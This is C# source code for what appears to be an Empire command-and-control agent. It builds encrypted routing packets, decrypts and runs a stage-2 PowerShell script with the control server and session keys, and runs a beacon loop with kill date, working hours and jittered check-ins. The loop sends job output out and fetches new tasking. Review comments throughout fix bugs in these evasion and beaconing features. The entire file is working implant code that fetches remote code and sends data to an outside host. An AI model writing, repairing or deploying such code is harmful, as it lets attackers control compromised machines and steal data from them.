////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
/// <summary>
/// Builds an Empire routing packet around an already-encrypted payload.
/// Layout on the wire: IV(4) || RC4(IV || stagingKey, header) || payload, where
/// header = agentID (ASCII) || lang(0x03) || meta || 0x00 0x00 || payloadLength (int32, BitConverter byte order).
/// </summary>
/// <param name="encryptedBytes">Payload to append; null or empty means header only, length field 0.</param>
/// <param name="meta">Packet type byte; Convert.ToByte throws OverflowException outside 0..255.</param>
/// <returns>The complete routing packet.</returns>
/// <remarks>
/// The header is RC4 under a key formed by prepending a fresh 4-byte IV to the
/// staging key, and nothing here adds an integrity check, so a party on the path
/// can alter header bytes without detection -- this mirrors the server-side format,
/// not a choice that can be changed on the agent alone.
/// </remarks>
private byte[] NewRoutingPacket(byte[] encryptedBytes, int meta)
{
    bool hasPayload = encryptedBytes != null && encryptedBytes.Length > 0;
    int payloadLength = hasPayload ? encryptedBytes.Length : 0;

    // Plaintext header: agent ID, then the 4 fixed bytes, then the length field.
    const byte lang = 0x03;
    byte[] header = Misc.combine(
        Encoding.ASCII.GetBytes(sessionInfo.GetAgentID()),
        new byte[4] { lang, Convert.ToByte(meta), 0x00, 0x00 });
    header = Misc.combine(header, BitConverter.GetBytes(payloadLength));

    // Fresh IV per packet; it is sent in the clear ahead of the encrypted header.
    byte[] iv = NewInitializationVector(4);
    byte[] headerKey = Misc.combine(iv, sessionInfo.GetStagingKeyBytes());
    byte[] packet = Misc.combine(iv, EmpireStager.rc4Encrypt(headerKey, header));

    return hasPayload ? Misc.combine(packet, encryptedBytes) : packet;
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
/// <summary>
/// Decrypts the stage-2 response (the Invoke-Empire script, AES under the session
/// key) and runs it in a fresh PowerShell runspace, followed by an Invoke-Empire
/// call that hands this agent's control server, keys and ID to the script.
/// </summary>
/// <param name="stage2Response">AES-encrypted script bytes as received from the server.</param>
/// <remarks>
/// First() throws InvalidOperationException when no control servers are configured.
/// The staging key and session key are placed in clear text on the command line;
/// PRINT builds additionally echo that line to the console, so never ship one.
/// Argument values are not quoted or escaped beyond the surrounding double quotes.
/// </remarks>
private void PowershellEmpire(byte[] stage2Response)
{
    byte[] scriptBytes = aesDecrypt(sessionInfo.GetSessionKey(), stage2Response);
    string empireScript = Encoding.ASCII.GetString(scriptBytes);

    // One PowerShell statement: Invoke-Empire plus its four parameters.
    string invokeLine = String.Concat(
        "Invoke-Empire",
        " -Servers \"", sessionInfo.GetControlServers().First(), "\"",
        " -StagingKey \"", sessionInfo.GetStagingKey(), "\"",
        " -SessionKey \"", sessionInfo.GetSessionKey(), "\"",
        " -SessionID \"", sessionInfo.GetAgentID(), "\"");
#if (PRINT)
    // Debug only: this line contains both keys.
    Console.WriteLine(invokeLine);
#endif
    using (Runspace runspace = RunspaceFactory.CreateRunspace())
    {
        runspace.Open();
        using (Pipeline pipeline = runspace.CreatePipeline())
        {
            // Script definition first, then the call, as a single statement list.
            pipeline.Commands.AddScript(empireScript + ";" + invokeLine + ";");
            pipeline.Invoke();
        }
    }
}
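////////////////////////////////////////////////////////////////////////////////
// Main Loop
////////////////////////////////////////////////////////////////////////////////
/// <summary>
/// One pass of the agent loop: exits on kill date or lost-check-in limit, sleeps
/// outside working hours, applies the jittered delay, sends pending job output,
/// then fetches and dispatches the next tasking. The caller (outside this view)
/// is expected to invoke it repeatedly.
/// </summary>
private void Run()
{
    ////////////////////////////////////////////////////////////////////////////////
    // Exit conditions: the kill date has passed, or too many check-ins were missed.
    // NOTE(review): the original test was killDate > now, which exits while the kill
    // date is still in the future and never once it has passed, contradicting the
    // "past killdate" message sent below. default(DateTime) is treated here as
    // "no kill date configured" -- confirm that is the sentinel SessionInfo uses.
    DateTime killDate = sessionInfo.GetKillDate();
    DateTime now = DateTime.Now;
    bool pastKillDate = killDate != default(DateTime) && now > killDate;
    bool lostLimitReached = coms.MissedCheckins > sessionInfo.GetDefaultLostLimit();
    if (pastKillDate || lostLimitReached)
    {
        // Flush whatever job output is still queued before reporting the exit.
        jobTracking.CheckAgentJobs(ref packets, ref coms);
        if (packets.Length > 0)
        {
            coms.SendMessage(packets);
        }
        string reason = pastKillDate ? "past killdate" : "Lost limit reached";
        string message = "[!] Agent " + sessionInfo.GetAgentID() + " exiting: " + reason;
        ushort result = 0;
        coms.SendMessage(coms.EncodePacket(2, message, result));
        Environment.Exit(1);
    }

    ////////////////////////////////////////////////////////////////////////////////
    // Working hours: check in only between start and end, otherwise sleep until the
    // window next opens. The getters return a non-nullable DateTime (AddDays and
    // CompareTo are called on them directly), so the original `null !=` guard was
    // always true; default(DateTime) is taken as "not configured" instead.
    DateTime workStart = sessionInfo.GetWorkingHoursStart();
    DateTime workEnd = sessionInfo.GetWorkingHoursEnd();
    if (workStart != default(DateTime) && workEnd != default(DateTime))
    {
        // A window that ends before it starts spans midnight: pull start back a day
        // so that start < end. Compare the whole span -- the original looked only at
        // the .Hours component, which is 0 for a span such as -30 minutes.
        if (workEnd - workStart < TimeSpan.Zero)
        {
            workStart = workStart.AddDays(-1);
            sessionInfo.SetWorkingHoursStart(workStart);
        }
        now = DateTime.Now;
        // NOTE(review): the original slept when now was INSIDE the window, and then
        // called TimeSpan.CompareTo(0) -- which throws ArgumentException for a boxed
        // int -- so that path never completed. Inverted here so the agent is quiet
        // outside working hours, which is what the "wait until start" arithmetic
        // below is built for.
        if (now <= workStart || now >= workEnd)
        {
            TimeSpan untilStart = workStart - now;
            if (untilStart < TimeSpan.Zero)
            {
                // Window already closed today: wait for tomorrow's start.
                untilStart = workStart.AddDays(1) - now;
            }
            SleepFor(untilStart);
        }
    }

    ////////////////////////////////////////////////////////////////////////////////
    // Check-in delay with jitter: sleep a random number of seconds in
    // [(1 - jitter) * delay, (1 + jitter) * delay).
    // NOTE(review): the original lower bound was (jitter - 1) * delay, which is
    // negative for any jitter in [0, 1] and so was always clamped to 0, making the
    // sleep range [0, (1 + jitter) * delay) regardless of the configured jitter.
    if (0 != sessionInfo.GetDefaultDelay())
    {
        double delay = sessionInfo.GetDefaultDelay();
        double jitter = sessionInfo.GetDefaultJitter();
        int minSeconds = ClampToInt((1.0 - jitter) * delay);
        int maxSeconds = ClampToInt((1.0 + jitter) * delay);
        if (minSeconds < 0)
        {
            minSeconds = 0;
        }
        if (maxSeconds < minSeconds)
        {
            // Random.Next(min, max) throws when min > max.
            maxSeconds = minSeconds;
        }
        // Random.Next's upper bound is exclusive, as in the original.
        int sleepSeconds = (minSeconds == maxSeconds)
            ? minSeconds
            : new Random().Next(minSeconds, maxSeconds);
        // The original multiplied by 1000 in int arithmetic, which overflows for
        // delays above ~24.8 days; SleepFor saturates instead.
        SleepFor(TimeSpan.FromSeconds(sleepSeconds));
    }

    ////////////////////////////////////////////////////////////////////////////////
    // Ship any output produced by running jobs.
    byte[] jobResults = jobTracking.GetAgentJobsOutput(ref coms);
    if (0 < jobResults.Length)
    {
        coms.SendMessage(jobResults);
    }

    ////////////////////////////////////////////////////////////////////////////////
    // Fetch tasking; a non-empty response resets the missed-check-in counter.
    byte[] taskData = coms.GetTask();
    if (taskData.Length > 0)
    {
        coms.MissedCheckins = 0;
        if (String.Empty != Encoding.UTF8.GetString(taskData))
        {
            coms.DecodeRoutingPacket(taskData, ref jobTracking);
        }
    }
    // Kept from the original; presumably to shorten the lifetime of decrypted
    // tasking in memory rather than for performance.
    GC.Collect();
}

/// <summary>
/// Sleeps for <paramref name="span"/>, ignoring non-positive spans and capping at
/// the largest value Thread.Sleep accepts (Int32.MaxValue milliseconds), so neither
/// a start time already in the past nor an oversized delay makes Thread.Sleep throw.
/// </summary>
private static void SleepFor(TimeSpan span)
{
    if (span <= TimeSpan.Zero)
    {
        return;
    }
    double millis = span.TotalMilliseconds;
    int clamped = millis >= int.MaxValue ? int.MaxValue : (int)millis;
    Thread.Sleep(clamped);
}

/// <summary>Converts a double to int, saturating at the int range instead of overflowing.</summary>
private static int ClampToInt(double value)
{
    if (value >= int.MaxValue)
    {
        return int.MaxValue;
    }
    if (value <= int.MinValue)
    {
        return int.MinValue;
    }
    return (int)value;
}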